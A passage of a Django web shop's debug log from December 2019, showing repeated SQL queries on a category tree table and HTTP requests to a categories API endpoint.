ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:00:58,946 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:00:58,951 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:00:58,955 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:00:58,959 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:00:58,965 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:00:58,969 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:00:58,974 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:00:58,977 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:00:58,981 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:00:58,986 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:00:58,990 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:00:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:05:02] "GET / HTTP/1.0" 302 0 [19/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 12:15:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:16:44,743 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:16:44,750 utils 4252 140031482124032 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 12:16:44,762 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:16:44,768 utils 4252 140031482124032 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:16:44,772 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:16:44,777 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [19/Dec/2019 12:16:44] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 12:16:44,782 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:16:44,785 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:16:44,788 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:16:44,791 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:16:44,794 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:16:44,800 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:16:44,803 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:16:44,808 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:16:44,812 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:16:44,817 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:16:44,825 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:16:44,829 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:16:44,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:16:44,837 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:16:44,842 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:16:44,849 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:16:44,854 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:16:44,857 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:16:44,860 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:16:44,862 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:16:44,866 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:16:44,873 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:16:44,877 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:16:44,881 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:16:44,885 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:16:44,889 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:16:44,893 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:16:44,897 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:16:44,901 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:16:44,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:16:44,909 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:16:44,913 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:16:44,915 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:16:44,918 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:16:44,920 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:16:44,922 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:16:44,925 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:16:44,928 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:16:44,930 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:16:44,932 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:16:44,935 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:16:44,937 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:16:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:23:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:27:44,125 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:27:44,132 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:27:44,136 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:27:44,139 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:27:44,143 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:27:44,146 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:27:44,148 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:27:44,150 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 